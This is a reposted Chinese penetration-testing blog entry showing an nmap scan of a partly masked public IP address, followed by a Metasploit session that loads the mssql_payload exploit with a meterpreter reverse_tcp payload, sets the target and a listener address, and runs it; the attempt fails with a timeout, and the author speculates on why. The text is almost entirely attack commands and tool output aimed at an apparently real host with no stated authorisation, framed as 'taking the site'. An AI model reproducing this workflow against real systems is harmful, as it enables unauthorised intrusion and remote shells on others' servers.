且构网

分享程序员开发的那些事...
且构网 - 分享程序员编程开发的那些事
您所在的位置:首页 > 渗透杂记-2013-07-13

渗透杂记-2013-07-13

更新时间:2022-10-01 17:27:33

从新浪移过来的

windows/mssql/mssql_payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
扫描一下
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间
NSE: Loaded 49 scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [1000 ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script Scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp closed smtp
80/tcp open http Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_html-title: Site doesn't have a title (text/html).
110/tcp closed pop3
3306/tcp open mysql MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O
3389/tcp open microsoft-rdp Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 50.00 ms 203.171.239.*
Read data files from: D:\metasploit\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)
开始拿站
Welcome to the Metasploit Web Console!
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 296 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 296 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload
Name: Microsoft SQL Server Payload Execution
Version: 9669
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload information:
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.osvdb.org/557
http://www.securityfocus.com/bid/1281
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
http://www.osvdb.org/15757
http://www.securityfocus.com/bid/4797
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf
>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit
[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.

经验总结:失败原因远端服务器没有打开1433端口,笔者怀疑即使服务器打开1433端口,也不一定能够成功,因为笔者所处内网,经过NAT映射出去,handler不一定能够反弹回来,是否如此还得实验验证。

本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1247879如需转载请自行联系原作者


谢文东666

上一篇 : :Linux unit 5下一篇 : 关联关系映射

相关阅读

推荐文章

网站首页网站地图Copyright © 2021-2022 且购网

免责声明:本站文章部分来源于互联网,如有侵权请联系站长,我们将在72小时内删除。